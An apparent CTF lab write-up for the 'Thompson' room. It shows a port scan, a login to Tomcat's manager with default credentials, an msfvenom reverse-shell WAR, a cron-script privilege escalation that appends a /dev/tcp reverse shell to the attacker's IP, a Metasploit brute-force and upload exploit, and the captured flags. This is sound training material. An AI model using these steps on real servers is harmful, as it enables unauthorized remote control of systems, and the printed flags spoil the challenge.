Thompson
### Thompson
Start Machine
read user.txt and root.txt
Answer the questions below
┌──(kali㉿kali)-[/]
└─$ rustscan -a 10.10.103.186 --ulimit 5500 -b 65535 -- -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5500.
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
Open 10.10.103.186:22
Open 10.10.103.186:8009
Open 10.10.103.186:8080
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-27 18:00 EST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 0.00s elapsed
Initiating Ping Scan at 18:00
Scanning 10.10.103.186 [2 ports]
Completed Ping Scan at 18:00, 0.20s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:00
Completed Parallel DNS resolution of 1 host. at 18:00, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 18:00
Scanning 10.10.103.186 [3 ports]
Discovered open port 8080/tcp on 10.10.103.186
Discovered open port 22/tcp on 10.10.103.186
Discovered open port 8009/tcp on 10.10.103.186
Completed Connect Scan at 18:00, 0.20s elapsed (3 total ports)
Initiating Service scan at 18:00
Scanning 3 services on 10.10.103.186
Completed Service scan at 18:00, 8.29s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.103.186.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 7.94s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 0.84s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 0.00s elapsed
Nmap scan report for 10.10.103.186
Host is up, received conn-refused (0.20s latency).
Scanned at 2022-12-27 18:00:16 EST for 18s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fc052481987eb8db0592a6e78eb02111 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDL+0hfJnh2z0jia21xVo/zOSRmzqE/qWyQv1G+8EJNXze3WPjXsC54jYeO0lp2SGq+sauzNvmWrHcrLKHtugMUQmkS9gD/p4zx4LjuG0WKYYeyLybs4WrTTmCU8PYGgmud9SwrDlEjX9AOEZgP/gj1FY+x+TfOtIT2OEE0Exvb86LhPj/AqdahABfCfxzHQ9ZyS6v4SMt/AvpJs6Dgady20CLxhYGY9yR+V4JnNl4jxwg2j64EGLx4vtCWNjwP+7ROkTmP6dzR7DxsH1h8Ko5C45HbTIjFzUmrJ1HMPZMo9ss0MsmeXPnZTmp5TxsxbLNJGSbDv7BS9gdCyTf0+Qq1
| 256 60c840abb009843d46646113fabc1fbe (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBG6CiO2B7Uei2whKgUHjLmGY7dq1uZFhZ3wY5EWj5L7ylSj+bx5pwaiEgU/Velkp4ZWXM//thL6K1lAAPGLxHMM=
| 256 b5527e9c019b980c73592035ee23f1a5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIwYtK4oCnQLSoBYAztlgcEsq8FLNL48LyxC2RfxC+33
8009/tcp open ajp13 syn-ack Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open http syn-ack Apache Tomcat 8.5.5
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.95 seconds
click in Manager App to login
https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown
http://10.10.103.186:8080/manager/html
and there are credentials
<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#war
now upload reverse.war
┌──(root㉿kali)-[/]
└─# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.8.19.103 LPORT=4242 -f war > reverse.war
Payload size: 1097 bytes
Final size of war file: 1097 bytes
revshell
┌──(root㉿kali)-[/]
└─# rlwrap nc -lvnp 4242
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4242
Ncat: Listening on 0.0.0.0:4242
after deploy check /reverse path
┌──(root㉿kali)-[/home/kali]
└─# rlwrap nc -lvnp 4242
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4242
Ncat: Listening on 0.0.0.0:4242
Ncat: Connection from 10.10.103.186.
Ncat: Connection from 10.10.103.186:43690.
whoami
tomcat
export TERM=xterm
export SHELL=bash
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
tomcat@ubuntu:/$ pwd
pwd
/
tomcat@ubuntu:/$ ls
ls
bin etc initrd.img.old lost+found opt run sys var
boot home lib media proc sbin tmp vmlinuz
dev initrd.img lib64 mnt root srv usr vmlinuz.old
tomcat@ubuntu:/$ find / -type f -name user.txt 2>dev/null
find / -type f -name user.txt 2>dev/null
/home/jack/user.txt
tomcat@ubuntu:/$ cd /home/jack
cd /home/jack
tomcat@ubuntu:/home/jack$ ls
ls
id.sh test.txt user.txt
tomcat@ubuntu:/home/jack$ cat user.txt
cat user.txt
39400c90bc683a41a8935e4719f181bf
priv esc
tomcat@ubuntu:/home/jack$ find / -perm -4000 2>/dev/null | xargs ls -lah
find / -perm -4000 2>/dev/null | xargs ls -lah
-rwsr-xr-x 1 root root 31K Jul 12 2016 /bin/fusermount
-rwsr-xr-x 1 root root 40K May 15 2019 /bin/mount
-rwsr-xr-x 1 root root 44K May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 44K May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 40K Mar 26 2019 /bin/su
-rwsr-xr-x 1 root root 27K May 15 2019 /bin/umount
-rwsr-xr-x 1 root root 71K Mar 26 2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 40K Mar 26 2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 74K Mar 26 2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 39K Mar 26 2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 53K Mar 26 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 134K Jun 10 2019 /usr/bin/sudo
-rwsr-xr-x 1 root root 11K May 8 2018 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-- 1 root messagebus 42K Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10K Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 419K Mar 4 2019 /usr/lib/openssh/ssh-keysign
tomcat@ubuntu:/home/jack$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root cd /home/jack && bash id.sh
tomcat@ubuntu:/home/jack$ cat id.sh
cat id.sh
#!/bin/bash
id > test.txt
tomcat@ubuntu:/home/jack$ cat test.txt
cat test.txt
uid=0(root) gid=0(root) groups=0(root)
tomcat@ubuntu:/home/jack$ echo "/bin/bash -i >& /dev/tcp/10.8.19.103/1337 0>&1" >> id.sh
┌──(root㉿kali)-[/home/kali]
└─# rlwrap nc -lvnp 1337
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.103.186.
Ncat: Connection from 10.10.103.186:39588.
bash: cannot set terminal process group (1065): Inappropriate ioctl for device
bash: no job control in this shell
root@ubuntu:/home/jack# cd /root
cd /root
root@ubuntu:~# ls
ls
root.txt
root@ubuntu:~# cat root.txt
cat root.txt
d89d5391984c0450a95497153ae7ca3a
--another way using metasploit
┌──(kali㉿kali)-[~]
└─$ msfconsole -q
msf6 > search tomcat_mgr_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/tomcat_mgr_login normal No Tomcat Application Manager Login Utility
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/http/tomcat_mgr_login
msf6 > use 0
msf6 auxiliary(scanner/http/tomcat_mgr_login) > show options
Module options (auxiliary/scanner/http/tomcat_mgr_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the curr
ent database
DB_ALL_PASS false no Add all passwords in the current database to the
list
DB_ALL_USERS false no Add all users in the current database to the lis
t
DB_SKIP_EXISTING none no Skip existing credentials stored in the current
database (Accepted: none, user, user&realm)
PASSWORD no The HTTP password to specify for authentication
PASS_FILE /usr/share/metasploit-frame no File containing passwords, one per line
work/data/wordlists/tomcat_
mgr_default_pass.txt
Proxies no A proxy chain of format type:host:port[,type:hos
t:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid
7/metasploit-framework/wiki/Using-Metasploit
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TARGETURI /manager/html yes URI for Manager login. Default is /manager/html
THREADS 1 yes The number of concurrent threads (max one per ho
st)
USERNAME no The HTTP username to specify for authentication
USERPASS_FILE /usr/share/metasploit-frame no File containing users and passwords separated by
work/data/wordlists/tomcat_ space, one pair per line
mgr_default_userpass.txt
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /usr/share/metasploit-frame no File containing users, one per line
work/data/wordlists/tomcat_
mgr_default_users.txt
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 10.10.103.186
RHOSTS => 10.10.103.186
msf6 auxiliary(scanner/http/tomcat_mgr_login) > exploit
[!] No active DB -- Credential data will not be saved!
[-] 10.10.103.186:8080 - LOGIN FAILED: admin:admin (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: admin:manager (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: admin:role1 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: admin:root (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: admin:QLogic66 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: admin:password (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: admin:Password1 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: admin:changethis (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: admin:r00t (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: admin:toor (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: admin:password1 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: admin:j2deployer (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: admin:OvW*busr1 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: admin:kdsxc (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: admin:owaspba (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: admin:ADMIN (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: admin:xampp (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: manager:admin (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: manager:manager (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: manager:role1 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: manager:root (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: manager:tomcat (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: manager:s3cret (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: manager:vagrant (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: manager:QLogic66 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: manager:password (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: manager:Password1 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: manager:changethis (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: manager:r00t (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: manager:toor (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: manager:password1 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: manager:j2deployer (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: manager:OvW*busr1 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: manager:kdsxc (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: manager:owaspba (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: manager:ADMIN (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: manager:xampp (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role1:admin (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role1:manager (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role1:root (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role1:tomcat (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role1:s3cret (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role1:vagrant (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role1:QLogic66 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role1:password (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role1:Password1 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role1:changethis (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role1:r00t (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role1:toor (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role1:password1 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role1:j2deployer (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role1:OvW*busr1 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role1:kdsxc (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role1:owaspba (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role1:ADMIN (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role1:xampp (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role:admin (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role:manager (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role:role1 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role:root (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role:tomcat (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role:s3cret (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role:vagrant (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role:QLogic66 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role:password (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role:Password1 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role:changethis (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role:r00t (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role:toor (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role:password1 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role:j2deployer (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role:OvW*busr1 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role:kdsxc (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role:owaspba (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role:ADMIN (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: role:xampp (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: root:admin (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: root:manager (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: root:role1 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: root:root (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: root:tomcat (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: root:s3cret (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: root:vagrant (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: root:QLogic66 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: root:password (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: root:Password1 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: root:changethis (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: root:r00t (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: root:toor (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: root:password1 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: root:j2deployer (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: root:OvW*busr1 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: root:kdsxc (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: root:owaspba (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: root:ADMIN (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: root:xampp (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: tomcat:manager (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: tomcat:role1 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: tomcat:root (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: tomcat:tomcat (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: tomcat:s3cret (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: tomcat:vagrant (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: tomcat:QLogic66 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: tomcat:password (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: tomcat:Password1 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: tomcat:changethis (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: tomcat:r00t (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: tomcat:toor (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: tomcat:password1 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: tomcat:j2deployer (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: tomcat:OvW*busr1 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: tomcat:kdsxc (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: tomcat:owaspba (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: tomcat:ADMIN (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: tomcat:xampp (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: both:admin (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: both:manager (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: both:role1 (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: both:root (Incorrect)
[-] 10.10.103.186:8080 - LOGIN FAILED: both:tomcat (Incorrect)
^C[*] Caught interrupt from the console...
[*] Auxiliary module execution completed
uhmm
┌──(kali㉿kali)-[~]
└─$ msfconsole -q -x 'use exploit/multi/http/tomcat_mgr_upload;set RHOSTS 10.10.103.186;set RPORT 8080;set HttpUsername tomcat;set HttpPassword s3cret;set LHOST 10.8.19.103;set LPORT 1235;run'
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
RHOSTS => 10.10.103.186
RPORT => 8080
HttpUsername => tomcat
HttpPassword => s3cret
LHOST => 10.8.19.103
LPORT => 1235
[*] Started reverse TCP handler on 10.8.19.103:1235
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying O7Ig1RhI0u0fXnk15DvUaUc...
[*] Executing O7Ig1RhI0u0fXnk15DvUaUc...
[*] Sending stage (58829 bytes) to 10.10.103.186
[*] Undeploying O7Ig1RhI0u0fXnk15DvUaUc ...
[*] Undeployed at /manager/html/undeploy
[*] Meterpreter session 1 opened (10.8.19.103:1235 -> 10.10.103.186:58616) at 2022-12-27 19:08:03 -0500
meterpreter > shell
Process 1 created.
Channel 1 created.
python -c 'import pty;pty.spawn("/bin/bash")'
tomcat@ubuntu:/$ ls
ls
bin etc initrd.img.old lost+found opt run sys var
boot home lib media proc sbin tmp vmlinuz
dev initrd.img lib64 mnt root srv usr vmlinuz.old
tomcat@ubuntu:/$ background
background
No command 'background' found, did you mean:
Command 'gbackground' from package 'gbackground' (universe)
background: command not found
tomcat@ubuntu:/$ ^Z
Background channel 1? [y/N] y
meterpreter > search -f user.txt
Found 1 result...
=================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
/home/jack/user.txt 33 2019-08-14 13:14:21 -0400
meterpreter > hashdump
[-] The "hashdump" command requires the "priv" extension to be loaded (run: `load priv`)
meterpreter > load priv
Loading extension priv...
[-] Failed to load extension: The "priv" extension is not supported by this Meterpreter type (java/linux)
[-] The "priv" extension is supported by the following Meterpreter payloads:
[-] - windows/x64/meterpreter*
[-] - windows/meterpreter*
It works :)
user.txt
39400c90bc683a41a8935e4719f181bf
root.txt
d89d5391984c0450a95497153ae7ca3a
[[The Cod Caper]]
Last updated
